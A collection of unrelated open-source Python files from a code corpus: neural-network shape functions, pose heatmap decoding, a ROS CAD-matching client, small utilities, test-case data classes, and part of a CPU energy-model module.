reg.register_pattern("nn.space_to_depth", OpPattern.INJECTIVE)
# correlation
reg.register_strategy("nn.correlation", strategy.correlation_strategy)
reg.register_pattern("nn.correlation", OpPattern.OUT_ELEMWISE_FUSABLE)
# space_to_batch_nd and batch_to_space_nd
reg.register_injective_schedule("nn.space_to_batch_nd")
reg.register_injective_schedule("nn.batch_to_space_nd")
#####################
# Shape functions #
#####################
@script
def _conv_shape_func(dshape, kshape, strides, padding, dilation):
out = output_tensor((dshape.shape[0],), "int64")
out[0] = dshape[0]
out[1] = kshape[0]
for i in const_range(dshape.shape[0] - 2):
dilated_k = (kshape[i + 2] - 1) * dilation[i] + 1
out[i + 2] = (dshape[i + 2] + 2 * padding[i] - dilated_k) // strides[i] + 1
return out
def conv_shape_func(attrs, inputs, _):
"""
Shape function for contrib_conv2d_NCHWc op.
"""
strides = get_const_tuple(attrs.strides)
padding = get_const_tuple(attrs.padding)
dilation = get_const_tuple(attrs.dilation)
return [
_conv_shape_func(
inputs[0],
inputs[1],
convert(strides),
convert(padding),
convert(dilation),
)
]
reg.register_shape_func("nn.conv1d", False, conv_shape_func)
reg.register_shape_func("nn.conv2d", False, conv_shape_func)
reg.register_shape_func("nn.conv3d", False, conv_shape_func)
@script
def _conv2d_NCHWc_shape_func(dshape, kshape, strides, padding, dilation, oc_bn):
out = output_tensor((dshape.shape[0],), "int64")
ic_chunk = dshape[1]
height = dshape[2]
width = dshape[3]
ic_bn = dshape[4]
kheight = kshape[2]
kwidth = kshape[3]
dilated_kh = (kheight - 1) * dilation[0] + 1
dilated_kw = (kwidth - 1) * dilation[1] + 1
kflatten = int64(1)
for i in const_range(kshape.shape[0]):
kflatten *= kshape[i]
oc = kflatten // (kheight * kwidth * ic_chunk * ic_bn)
oc_chunk = oc // oc_bn
out_height = (height + 2 * padding[0] - dilated_kh) // strides[0] + 1
out_width = (width + 2 * padding[1] - dilated_kw) // strides[1] + 1
out[0] = dshape[0]
out[1] = oc_chunk
out[2] = out_height
out[3] = out_width
out[4] = int64(oc_bn)
return out
@reg.register_shape_func("nn.contrib_conv2d_NCHWc", False)
def conv2d_NCHWc_shape_func(attrs, inputs, _):
"""
Shape function for contrib_conv2d_NCHWc op.
"""
strides = get_const_tuple(attrs.strides)
padding = get_const_tuple(attrs.padding)
dilation = get_const_tuple(attrs.dilation)
out_layout = attrs.out_layout
oc_bn = int(out_layout[4:-1])
return [
_conv2d_NCHWc_shape_func(
inputs[0],
inputs[1],
convert(strides),
convert(padding),
convert(dilation),
convert(oc_bn),
)
]
@script
def _conv2d_transpose_nchw_shape_func(dshape, kshape, strides, padding, dilation, output_padding):
out = output_tensor((dshape.shape[0],), "int64")
kheight = kshape[2]
kwidth = kshape[3]
dilated_kh = (kheight - 1) * dilation[0] + 1
dilated_kw = (kwidth - 1) * dilation[1] + 1
out_height = strides[0] * (dshape[2] - 1) + dilated_kh - 2 * padding[0] + output_padding[0]
out_width = strides[1] * (dshape[3] - 1) + dilated_kw - 2 * padding[1] + output_padding[1]
out[0] = dshape[0]
out[1] = kshape[1]
out[2] = out_height
out[3] = out_width
return out
@reg.register_shape_func("nn.conv2d_transpose", False)
def conv2d_transpose_nchw_shape_func(attrs, inputs, _):
"""
Shape function for conv2d_transpose op.
"""
strides = get_const_tuple(attrs.strides)
padding = get_const_tuple(attrs.padding)
dilation = get_const_tuple(attrs.dilation)
output_padding = get_const_tuple(attrs.output_padding)
return [
_conv2d_transpose_nchw_shape_func(
inputs[0],
inputs[1],
convert(strides),
convert(padding),
convert(dilation),
convert(output_padding),
)
]
@script
def _pool2d_shape_func(data_shape, pool_size, strides, padding, height_axis, width_axis):
out = output_tensor((data_shape.shape[0],), "int64")
for i in const_range(data_shape.shape[0]):
if i == height_axis:
out[i] = (data_shape[i] + padding[0] + padding[2] - pool_size[0]) // strides[0] + 1
elif i == width_axis:
out[i] = (data_shape[i] + padding[1] + padding[3] - pool_size[1]) // strides[1] + 1
else:
out[i] = data_shape[i]
return out
def pool2d_shape_func(attrs, inputs, _):
"""
Shape function for pool2d op.
"""
pool_size = get_const_tuple(attrs.pool_size)
strides = get_const_tuple(attrs.strides)
padding = get_const_tuple(attrs.padding)
layout = attrs.layout
height_axis = layout.index("H")
width_axis = layout.index("W")
if len(padding) == 1:
padding = [padding[0]] * 4
elif len(padding) == 2:
padding = [padding[0], padding[1], padding[0], padding[1]]
return [
_pool2d_shape_func(
inputs[0],
convert(pool_size),
convert(strides),
convert(padding),
convert(height_axis),
convert(width_axis),
)
]
reg.register_shape_func("nn.max_pool2d", False, pool2d_shape_func)
reg.register_shape_func("nn.avg_pool2d", False, pool2d_shape_func)
@script
def _global_pool2d_shape_func(data_shape, height_axis, width_axis):
out = output_tensor((data_shape.shape[0],), "int64")
for i in const_range(out.shape[0]):
if i == height_axis or i == width_axis:
out[i] = int64(1)
else:
out[i] = data_shape[i]
return out
def global_pool2d_shape_func(attrs, inputs, _):
"""
Shape function for global pool2d op.
"""
layout = attrs.layout
height_axis = width_axis = 1
for i, letter in enumerate(layout):
if letter == "H":
height_axis = i
if letter == "W":
width_axis = i
return [_global_pool2d_shape_func(inputs[0], convert(height_axis), convert(width_axis))]
reg.register_shape_func("nn.global_max_pool2d", False, global_pool2d_shape_func)
reg.register_shape_func("nn.global_avg_pool2d", False, global_pool2d_shape_func)
@script
def _batch_flatten_shape_func(data_shape):
out = output_tensor((2,), "int64")
out[0] = data_shape[0]
out[1] = int64(1)
for i in const_range(data_shape.shape[0] - 1):
out[1] *= data_shape[i + 1]
return out
@reg.register_shape_func("nn.batch_flatten", False)
def batch_flatten_shape_func(attrs, inputs, _):
"""
Shape function for batch_flatten op.
"""
return [_batch_flatten_shape_func(inputs[0])]
@script
def _dense_shape_func(data_shape, weight_shape):
out = output_tensor((data_shape.shape[0],), "int64")
for i in const_range(out.shape[0] - 1):
out[i] = data_shape[i]
out[out.shape[0] - 1] = weight_shape[0]
return out
@reg.register_shape_func("nn.dense", False)
def dense_shape_func(attrs, inputs, _):
"""
Shape function for dense op.
"""
ret = [_dense_shape_func(inputs[0], inputs[1])]
return ret
@script
def _dense_pack_shape_func(data_shape, weight_shape):
out = output_tensor((data_shape.shape[0],), "int64")
for i in const_range(out.shape[0] - 1):
out[i] = data_shape[i]
out[out.shape[0] - 1] = weight_shape[0] * weight_shape[2]
return out
@reg.register_shape_func("nn.contrib_dense_pack", False)
def dense_pack_shape_func(attrs, inputs, _):
"""
Shape function for dense_pack op.
"""
ret = [_dense_pack_shape_func(inputs[0], inputs[1])]
return ret
@script
def _batch_matmul_shape_func(data_shape, weight_shape):
out = output_tensor((data_shape.shape[0],), "int64")
for i in const_range(out.shape[0] - 1):
if i == 0:
out[i] = max(data_shape[i], weight_shape[i])
else:
out[i] = data_shape[i]
out[out.shape[0] - 1] = weight_shape[weight_shape.shape[0] - 2]
return out
@reg.register_shape_func("nn.batch_matmul", False)
def batch_matmul_shape_func(attrs, inputs, _):
"""
Shape function for dense op.
"""
ret = [_batch_matmul_shape_func(inputs[0], inputs[1])]
return ret
@script
def _pad_shape_func(data_shape, pad_width):
out = output_tensor((data_shape.shape[0],), "int64")
for i in const_range(out.shape[0]):
out[i] = data_shape[i] + pad_width[i][0] + pad_width[i][1]
return out
@reg.register_shape_func("nn.pad", False)
def pad_shape_func(attrs, inputs, _):
"""
Shape function for pad op.
"""
pad_width = []
for pair in attrs.pad_width:
pad_width.append(get_const_tuple(pair))
return [_pad_shape_func(inputs[0], convert(pad_width))]
@script
def _dilate_shape_func(data_shape, strides):
out = output_tensor((data_shape.shape[0],), "int64")
for i in const_range(out.shape[0]):
out[i] = (data_shape[i] - 1) * strides[i] + 1
return out
@reg.register_shape_func("nn.dilate", False)
def dilate_shape_func(attrs, inputs, _):
"""
Shape function for dilate op.
"""
return [_dilate_shape_func(inputs[0], convert(attrs.strides))]
reg.register_shape_func("nn.bias_add", False, elemwise_shape_func)
reg.register_shape_func("nn.softmax", False, elemwise_shape_func)
reg.register_shape_func("nn.relu", False, elemwise_shape_func)
|
the-stack_106_22061
|
import numpy as np
import warnings
import cv2
import torch
def topdownhead_decode_heatmaps_without_cs(output):
"""Decode keypoints from heatmaps.
Args:
img_metas (list(dict)): Information about data augmentation
By default this includes:
- "image_file: path to the image file
- "center": center of the bbox
- "scale": scale of the bbox
- "rotation": rotation of the bbox
- "bbox_score": score of bbox
output (np.ndarray[N, K, H, W]): model predicted heatmaps.
"""
batch_size = output.shape[0]
preds, maxvals = keypoints_from_heatmaps_without_cs(output)
all_preds = torch.zeros(
(batch_size, preds.shape[1], 3), dtype=torch.float32)
all_preds[:, :, 0:2] = preds[:, :, 0:2]
all_preds[:, :, 2:3] = maxvals
return all_preds
def keypoints_from_heatmaps_without_cs(
heatmaps,
unbiased=False,
post_process="default",
kernel=11,
valid_radius_factor=0.0546875,
use_udp=False,
target_type="GaussianHeatmap",
):
"""Get final keypoint predictions from heatmaps and transform them back to
the image.
Note:
batch size: N
num keypoints: K
heatmap height: H
heatmap width: W
Args:
heatmaps (np.ndarray[N, K, H, W]): model predicted heatmaps.
center (np.ndarray[N, 2]): Center of the bounding box (x, y).
scale (np.ndarray[N, 2]): Scale of the bounding box
wrt height/width.
post_process (str/None): Choice of methods to post-process
heatmaps. Currently supported: None, 'default', 'unbiased',
'megvii'.
unbiased (bool): Option to use unbiased decoding. Mutually
exclusive with megvii.
Note: this arg is deprecated and unbiased=True can be replaced
by post_process='unbiased'
Paper ref: Zhang et al. Distribution-Aware Coordinate
Representation for Human Pose Estimation (CVPR 2020).
kernel (int): Gaussian kernel size (K) for modulation, which should
match the heatmap gaussian sigma when training.
K=17 for sigma=3 and k=11 for sigma=2.
valid_radius_factor (float): The radius factor of the positive area
in classification heatmap for UDP.
use_udp (bool): Use unbiased data processing.
target_type (str): 'GaussianHeatmap' or 'CombinedTarget'.
GaussianHeatmap: Classification target with gaussian distribution.
CombinedTarget: The combination of classification target
(response map) and regression target (offset map).
Paper ref: Huang et al. The Devil is in the Details: Delving into
Unbiased Data Processing for Human Pose Estimation (CVPR 2020).
Returns:
tuple: A tuple containing keypoint predictions and scores.
- preds (np.ndarray[N, K, 2]): Predicted keypoint location in images.
- maxvals (np.ndarray[N, K, 1]): Scores (confidence) of the keypoints.
"""
# Avoid being affected
# detect conflicts
if unbiased:
assert post_process not in [False, None, "megvii"]
if post_process in ["megvii", "unbiased"]:
assert kernel > 0
if use_udp:
assert not post_process == "megvii"
# normalize configs
if post_process is False:
warnings.warn(
"post_process=False is deprecated, " "please use post_process=None instead",
DeprecationWarning,
)
post_process = None
elif post_process is True:
if unbiased is True:
warnings.warn(
"post_process=True, unbiased=True is deprecated,"
" please use post_process='unbiased' instead",
DeprecationWarning,
)
post_process = "unbiased"
else:
warnings.warn(
"post_process=True, unbiased=False is deprecated, "
"please use post_process='default' instead",
DeprecationWarning,
)
post_process = "default"
elif post_process == "default":
if unbiased is True:
warnings.warn(
"unbiased=True is deprecated, please use "
"post_process='unbiased' instead",
DeprecationWarning,
)
post_process = "unbiased"
# start processing
if post_process == "megvii":
heatmaps = _gaussian_blur(heatmaps, kernel=kernel)
N, K, H, W = heatmaps.shape
if use_udp:
if target_type.lower() == "GaussianHeatMap".lower():
preds, maxvals = _get_max_preds_tensor(heatmaps)
preds = post_dark_udp(preds, heatmaps, kernel=kernel)
elif target_type.lower() == "CombinedTarget".lower():
for person_heatmaps in heatmaps:
for i, heatmap in enumerate(person_heatmaps):
kt = 2 * kernel + 1 if i % 3 == 0 else kernel
cv2.GaussianBlur(heatmap, (kt, kt), 0, heatmap)
# valid radius is in direct proportion to the height of heatmap.
valid_radius = valid_radius_factor * H
offset_x = heatmaps[:, 1::3, :].flatten() * valid_radius
offset_y = heatmaps[:, 2::3, :].flatten() * valid_radius
heatmaps = heatmaps[:, ::3, :]
preds, maxvals = _get_max_preds_tensor(heatmaps)
index = preds[..., 0] + preds[..., 1] * W
index += W * H * np.arange(0, N * K / 3)
index = index.astype(int).reshape(N, K // 3, 1)
preds += np.concatenate((offset_x[index], offset_y[index]), axis=2)
else:
raise ValueError(
"target_type should be either " "'GaussianHeatmap' or 'CombinedTarget'"
)
else:
preds, maxvals = _get_max_preds_tensor(heatmaps)
if post_process == "unbiased": # alleviate biased coordinate
# apply Gaussian distribution modulation.
heatmaps = np.log(np.maximum(
_gaussian_blur(heatmaps, kernel), 1e-10))
for n in range(N):
for k in range(K):
preds[n][k] = _taylor(heatmaps[n][k], preds[n][k])
elif post_process is not None:
pass
# add +/-0.25 shift to the predicted locations for higher acc.
# this is default behavior
# for n in range(N):
# for k in range(K):
# heatmap = heatmaps[n][k]
# px = int(preds[n][k][0])
# py = int(preds[n][k][1])
# if 1 < px < W - 1 and 1 < py < H - 1:
# diff = torch.tensor(
# [
# heatmap[py][px + 1] - heatmap[py][px - 1],
# heatmap[py + 1][px] - heatmap[py - 1][px],
# ]
# )
# preds[n][k] += torch.sign(diff) * 0.25
# if post_process == "megvii":
# preds[n][k] += 0.5
return preds, maxvals
def _taylor(heatmap, coord):
"""Distribution aware coordinate decoding method.
Note:
heatmap height: H
heatmap width: W
Args:
heatmap (np.ndarray[H, W]): Heatmap of a particular joint type.
coord (np.ndarray[2,]): Coordinates of the predicted keypoints.
Returns:
np.ndarray[2,]: Updated coordinates.
"""
H, W = heatmap.shape[:2]
px, py = int(coord[0]), int(coord[1])
if 1 < px < W - 2 and 1 < py < H - 2:
dx = 0.5 * (heatmap[py][px + 1] - heatmap[py][px - 1])
dy = 0.5 * (heatmap[py + 1][px] - heatmap[py - 1][px])
dxx = 0.25 * (heatmap[py][px + 2] - 2 *
heatmap[py][px] + heatmap[py][px - 2])
dxy = 0.25 * (
heatmap[py + 1][px + 1]
- heatmap[py - 1][px + 1]
- heatmap[py + 1][px - 1]
+ heatmap[py - 1][px - 1]
)
dyy = 0.25 * (
heatmap[py + 2 * 1][px] - 2 *
heatmap[py][px] + heatmap[py - 2 * 1][px]
)
derivative = np.array([[dx], [dy]])
hessian = np.array([[dxx, dxy], [dxy, dyy]])
if dxx * dyy - dxy ** 2 != 0:
hessianinv = np.linalg.inv(hessian)
offset = -hessianinv @ derivative
offset = np.squeeze(np.array(offset.T), axis=0)
coord += offset
return coord
def post_dark_udp(coords, batch_heatmaps, kernel=3):
"""DARK post-pocessing. Implemented by udp. Paper ref: Huang et al. The
Devil is in the Details: Delving into Unbiased Data Processing for Human
Pose Estimation (CVPR 2020). Zhang et al. Distribution-Aware Coordinate
Representation for Human Pose Estimation (CVPR 2020).
Note:
batch size: B
num keypoints: K
num persons: N
height of heatmaps: H
width of heatmaps: W
B=1 for bottom_up paradigm where all persons share the same heatmap.
B=N for top_down paradigm where each person has its own heatmaps.
Args:
coords (np.ndarray[N, K, 2]): Initial coordinates of human pose.
batch_heatmaps (np.ndarray[B, K, H, W]): batch_heatmaps
kernel (int): Gaussian kernel size (K) for modulation.
Returns:
res (np.ndarray[N, K, 2]): Refined coordinates.
"""
if not isinstance(batch_heatmaps, np.ndarray):
batch_heatmaps = batch_heatmaps.cpu().numpy()
B, K, H, W = batch_heatmaps.shape
N = coords.shape[0]
assert B == 1 or B == N
for heatmaps in batch_heatmaps:
for heatmap in heatmaps:
cv2.GaussianBlur(heatmap, (kernel, kernel), 0, heatmap)
np.clip(batch_heatmaps, 0.001, 50, batch_heatmaps)
np.log(batch_heatmaps, batch_heatmaps)
batch_heatmaps = np.transpose(
batch_heatmaps, (2, 3, 0, 1)).reshape(H, W, -1)
batch_heatmaps_pad = cv2.copyMakeBorder(
batch_heatmaps, 1, 1, 1, 1, borderType=cv2.BORDER_REFLECT
)
batch_heatmaps_pad = np.transpose(
batch_heatmaps_pad.reshape(H + 2, W + 2, B, K), (2, 3, 0, 1)
).flatten()
index = coords[..., 0] + 1 + (coords[..., 1] + 1) * (W + 2)
index += (W + 2) * (H + 2) * np.arange(0, B * K).reshape(-1, K)
index = index.astype(int).reshape(-1, 1)
i_ = batch_heatmaps_pad[index]
ix1 = batch_heatmaps_pad[index + 1]
iy1 = batch_heatmaps_pad[index + W + 2]
ix1y1 = batch_heatmaps_pad[index + W + 3]
ix1_y1_ = batch_heatmaps_pad[index - W - 3]
ix1_ = batch_heatmaps_pad[index - 1]
iy1_ = batch_heatmaps_pad[index - 2 - W]
dx = 0.5 * (ix1 - ix1_)
dy = 0.5 * (iy1 - iy1_)
derivative = np.concatenate([dx, dy], axis=1)
derivative = derivative.reshape(N, K, 2, 1)
dxx = ix1 - 2 * i_ + ix1_
dyy = iy1 - 2 * i_ + iy1_
dxy = 0.5 * (ix1y1 - ix1 - iy1 + i_ + i_ - ix1_ - iy1_ + ix1_y1_)
hessian = np.concatenate([dxx, dxy, dxy, dyy], axis=1)
hessian = hessian.reshape(N, K, 2, 2)
hessian = np.linalg.inv(hessian + np.finfo(np.float32).eps * np.eye(2))
coords -= np.einsum("ijmn,ijnk->ijmk", hessian, derivative).squeeze()
return coords
def _gaussian_blur(heatmaps, kernel=11):
"""Modulate heatmap distribution with Gaussian.
sigma = 0.3*((kernel_size-1)*0.5-1)+0.8
sigma~=3 if k=17
sigma=2 if k=11;
sigma~=1.5 if k=7;
sigma~=1 if k=3;
Note:
batch_size: N
num_keypoints: K
heatmap height: H
heatmap width: W
Args:
heatmaps (np.ndarray[N, K, H, W]): model predicted heatmaps.
kernel (int): Gaussian kernel size (K) for modulation, which should
match the heatmap gaussian sigma when training.
K=17 for sigma=3 and k=11 for sigma=2.
Returns:
np.ndarray[N, K, H, W]: Modulated heatmap distribution.
"""
assert kernel % 2 == 1
border = (kernel - 1) // 2
batch_size = heatmaps.shape[0]
num_joints = heatmaps.shape[1]
height = heatmaps.shape[2]
width = heatmaps.shape[3]
for i in range(batch_size):
for j in range(num_joints):
origin_max = np.max(heatmaps[i, j])
dr = np.zeros((height + 2 * border, width +
2 * border), dtype=np.float32)
dr[border:-border, border:-border] = heatmaps[i, j].copy()
dr = cv2.GaussianBlur(dr, (kernel, kernel), 0)
heatmaps[i, j] = dr[border:-border, border:-border].copy()
heatmaps[i, j] *= origin_max / np.max(heatmaps[i, j])
return heatmaps
def _get_max_preds_tensor(heatmaps):
assert isinstance(
heatmaps, torch.Tensor), "heatmaps should be torch.tensor for onnx export"
assert heatmaps.ndim == 4, "batch_images should be 4-ndim"
N, K, _, W = heatmaps.shape
heatmaps_reshaped = heatmaps.reshape((N, K, -1))
maxvals, idx = torch.max(heatmaps_reshaped, dim=2)
maxvals = maxvals.unsqueeze(-1)
idx = idx.unsqueeze(-1)
idx_repeated = idx.repeat(1, 1, 2).to(torch.float32)
preds = idx_repeated.clone()
preds[:, :, 0] = preds[:, :, 0] % W
preds[:, :, 1] = preds[:, :, 1] // W
a = idx_repeated > 0.0
preds = torch.where(a, preds, torch.tensor(-1.0).to(torch.float32))
return preds, maxvals
|
the-stack_106_22064
|
#!/usr/bin/env python
# Copyright 2021 Roboception GmbH
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# * Neither the name of the {copyright_holder} nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from __future__ import absolute_import
import rospy
from math import sqrt
from tf2_msgs.msg import TFMessage
from geometry_msgs.msg import TransformStamped, Quaternion
from rc_reason_msgs.srv import CadMatchDetectObject
from visualization_msgs.msg import Marker, MarkerArray
from std_msgs.msg import ColorRGBA
from .rest_client import RestClient
from .transform_helpers import lc_to_marker, load_carrier_to_tf, match_to_tf
class CadMatchClient(RestClient):
def __init__(self):
ignored_parameters = ['load_carrier_crop_distance', 'load_carrier_model_tolerance']
super(CadMatchClient, self).__init__('rc_cadmatch', ignored_parameters)
# client only parameters
self.publish_tf = rospy.get_param("~publish_tf", True)
self.publish_markers = rospy.get_param("~publish_markers", True)
self.pub_tf = rospy.Publisher('/tf', TFMessage, queue_size=10)
self.pub_markers = rospy.Publisher('visualization_marker_array', MarkerArray, queue_size=10)
self.lc_markers = []
self.add_rest_service(CadMatchDetectObject, 'detect_object', self.detect_cb)
rospy.on_shutdown(self.stop)
self.start()
def start(self):
rospy.loginfo("starting %s", self.rest_name)
self.call_rest_service('start')
def stop(self):
rospy.loginfo("stopping %s", self.rest_name)
self.call_rest_service('stop')
def detect_cb(self, srv_name, srv_type, request):
response = self.call_rest_service(srv_name, srv_type, request)
self.pub_matches(response.matches)
self.publish_lcs(response.load_carriers)
return response
def pub_matches(self, matches):
if not matches or not self.publish_tf:
return
transforms = [match_to_tf(i) for i in matches]
self.pub_tf.publish(TFMessage(transforms=transforms))
def publish_lcs(self, lcs):
if lcs and self.publish_tf:
transforms = [load_carrier_to_tf(lc, i) for i, lc in enumerate(lcs)]
self.pub_tf.publish(TFMessage(transforms=transforms))
if self.publish_markers:
self.publish_lc_markers(lcs)
def publish_lc_markers(self, lcs):
new_markers = []
for i, lc in enumerate(lcs):
m = lc_to_marker(lc, i, self.rest_name + "_lcs")
if i < len(self.lc_markers):
self.lc_markers[i] = m
else:
self.lc_markers.append(m)
new_markers.append(m)
for i in range(len(lcs), len(self.lc_markers)):
# delete old markers
self.lc_markers[i].action = Marker.DELETE
self.pub_markers.publish(MarkerArray(markers=self.lc_markers))
self.lc_markers = new_markers
def main():
client = CadMatchClient()
try:
rospy.spin()
except KeyboardInterrupt:
pass
if __name__ == '__main__':
main()
|
the-stack_106_22068
|
def load_input():
cases = open("input.txt", "r").readlines()
for i in range(len(cases)):
cases[i] = cases[i].replace('\n','')
return cases
groups = []
def parse_input():
inp = load_input()
inp_len = len(inp)
group = []
for i in range(inp_len):
line = inp[i]
if line == '' and len(group) != 0:
groups.append(group)
group = []
elif len(line) != 0:
group.append(line)
if len(group) != 0:
groups.append(group)
def count_group(group):
answer_set = set()
group_len = len(group)
for i in range(group_len):
answer_set.update(group[i])
return len(answer_set)
parse_input()
sum_count = 0
for i in range(len(groups)):
sum_count += count_group(groups[i])
print(sum_count)
# print(groups)
|
the-stack_106_22069
|
import logging
import collections
import numpy as np
logger = logging.getLogger(__name__)
LabelGrouping = collections.namedtuple('LabelGrouping',
['title', 'Y', 'Y_labels', ])
DataSplit = collections.namedtuple('DataSplit',
[ 'X_train', 'X_test', 'Y_train', 'Y_test'])
def group_labels(Y, target_names, label_group_dict):
""" Create a grouping between the labels i.e. map several labels
to the same value.
Expects a grouping dict with all labels, of the form e.g.
{0: ['job', 'time frame'],
1: ['further information',
'contact information']
...
}
The keys of the dictionary can also be strings which results in a
renaming of the group instead of a concatenation of the names.
"""
new_column_arrays = []
new_labels = []
for key, labels in label_group_dict.items():
# if a new name was given for the label group then use that
if type(key) == str:
new_labels.append(key)
# otherwise use the stringified the list of labels for that group
else:
new_labels.append(str(labels))
label_ids = []
# collect id's for labels to be joined
for label in labels:
try:
label_ids.append(target_names.index(label))
except ValueError:
logger.debug("Label '" + label + "' not found in labels, "+
"skipping.")
# create new label by taking the max from all labels to be joined
try:
new_column_arrays.append(Y[:,label_ids].max(axis=1, keepdims=True))
except (ValueError, IndexError):
# No labels found in this label group, skip this group
pass
return (np.hstack(new_column_arrays), new_labels)
def make_grouping(cluster_predictions, target_names):
clustered_tags = {}
for i, label in enumerate(target_names):
cluster_idx = int(cluster_predictions)
try:
clustered_tags[cluster_idx].append(label)
except KeyError:
clustered_tags[cluster_idx] = [label]
|
the-stack_106_22070
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2021/1/23 18:48
# @Author : Charseki.Chen
# @Email : [email protected]
# @Site : https://www.chenshengkai.com
# @File : datatype.py
# @Software: PyCharm
class TestSuite():
sub_suites = None
name = ""
details = ""
testcase_list = None
def to_dict(self):
me = {'name': self.name,
'details': self.details,
'testcase_list': [],
'sub_suites': []}
if self.sub_suites:
for s in self.sub_suites:
me['sub_suites'].append(s.to_dict())
if self.testcase_list:
for t in self.testcase_list:
me['testcase_list'].append(t.to_dict())
return me
class TestCase():
name = ""
summary = ""
preconditions = ""
importance = 2
execution_type = 1
steps = None
def to_dict(self):
me = {'name': self.name,
'summary': self.summary,
'preconditions': self.preconditions,
'importance': self.importance or 2,
'execution_type': self.execution_type,
'steps': []}
if self.steps:
for s in self.steps:
me['steps'].append(s.to_dict())
return me
class TestStep():
number = 1
action = ""
expected = ""
execution_type = 1
def to_dict(self):
me = {'number': self.number,
'action': self.action,
'expected': self.expected,
'execution_type': self.execution_type}
return me
cache = {}
|
the-stack_106_22072
|
# SPDX-License-Identifier: Apache-2.0
#
# Copyright (C) 2016, ARM Limited and contributors.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from collections import namedtuple, OrderedDict
from itertools import product
import logging
import operator
import re
import pandas as pd
import numpy as np
from devlib.utils.misc import memoized, mask_to_list
from devlib import TargetError
"""Classes for modeling and estimating energy usage of CPU systems"""
def read_multiple_oneline_files(target, glob_patterns):
"""
Quickly read many single-line files that match a glob pattern
Finds all the files that match any of the glob patterns and, assuming that
they each contain exactly 1 line of text, read them all at once. When the
target or connection is slow this saves a lot of time when reading a large
number of files.
This will only work safely on stationary files, don't try to use it where
the glob expansion will change often - for example /proc/**/autogroup would
not work because /proc/ entries will likely appear & disappear while we're
reading them.
:param target: devlib target object to read from
:param glob_pattern: Unix glob pattern matching the files to read
:returns: A dictionary mapping matched paths to the values read. ``{}`` if
no paths matched the globs.
"""
find_cmd = 'find ' + ' '.join(glob_patterns)
try:
paths = target.execute(find_cmd).split()
except TargetError:
return {}
cmd = '{} | {} xargs cat'.format(find_cmd, target.busybox)
contents = target.execute(cmd).splitlines()
if len(contents) != len(paths):
raise RuntimeError('File count mismatch while reading multiple files')
return dict(zip(paths, contents))
class EnergyModelCapacityError(Exception):
"""Used by :meth:`EnergyModel.get_optimal_placements`"""
pass
class ActiveState(namedtuple('ActiveState', ['capacity', 'power'])):
"""Represents power and compute capacity at a given frequency
:param capacity: Relative compute capacity at frequency
:param power: Power usage at frequency
"""
def __new__(cls, capacity=None, power=None):
return super(ActiveState, cls).__new__(cls, capacity, power)
class _CpuTree(object):
"""Internal class. Abstract representation of a CPU topology.
Each node contains either a single CPU or a set of child nodes.
"""
def __init__(self, cpu, children):
if (cpu is None) == (children is None):
raise ValueError('Provide exactly one of: cpu or children')
self.parent = None
self.cpu = cpu
if cpu is not None:
self.cpus = (cpu,)
self.children = []
else:
if len(children) == 0:
raise ValueError('children cannot be empty')
self.cpus = tuple(sorted(set().union(*[n.cpus for n in children])))
self.children = children
for child in children:
child.parent = self
self.name = None
def __repr__(self):
name_bit = ''
if self.name:
name_bit = 'name="{}", '.format(self.name)
if self.children:
return '{}({}children={})'.format(
self.__class__.__name__, name_bit, self.children)
else:
return '{}({}cpus={})'.format(
self.__class__.__name__, name_bit, self.cpus)
def _iter(self, include_non_leaves):
for child in self.children:
for child_i in child._iter(include_non_leaves):
yield child_i
if include_non_leaves or not self.children:
yield self
def iter_nodes(self):
"""Iterate over nodes depth-first, post-order"""
return self._iter(True)
def iter_leaves(self):
"""Iterate over leaves"""
return self._iter(False)
class EnergyModelNode(_CpuTree):
"""Describes topology and energy data for an EnergyModel.
Represents a CPU topology with energy data. The active and idle state data
represents the power usage of just the hardware resources of this topology
level, not its children. e.g. If the node represents a cluster, the power
numbers should not include power used by the CPU - that power should be
included the data of the child nodes.
Exactly one of ``cpu`` and ``children`` must be given.
:param active_states: Dict mapping frequencies to :class:`ActiveState`
values. Compute capacity data is optional for
non-leaf nodes.
:param idle_states: Dict mapping idle state names to power usage values
:param cpu: The CPU this node represents. If provided, this is a leaf node.
:type cpus: tuple(int)
:param children: Non-empty list of child :class:`EnergyModelNode` objects
:param name: Optional human-readable name for this node. Leaf (CPU) nodes
have a default name of "cpuN" where N is the cpu number.
:ivar cpus: CPUs contained in this node. Includes those of child nodes.
:ivar cpu: For convenience, this holds the single CPU contained by leaf
nodes. ``None`` for non-leaf nodes.
"""
def __init__(self, active_states, idle_states,
cpu=None, children=None, name=None):
super(EnergyModelNode, self).__init__(cpu, children)
self._log = logging.getLogger('EnergyModel')
def is_monotonic(l, decreasing=False):
op = operator.ge if decreasing else operator.le
return all(op(a, b) for a, b in zip(l, l[1:]))
if active_states:
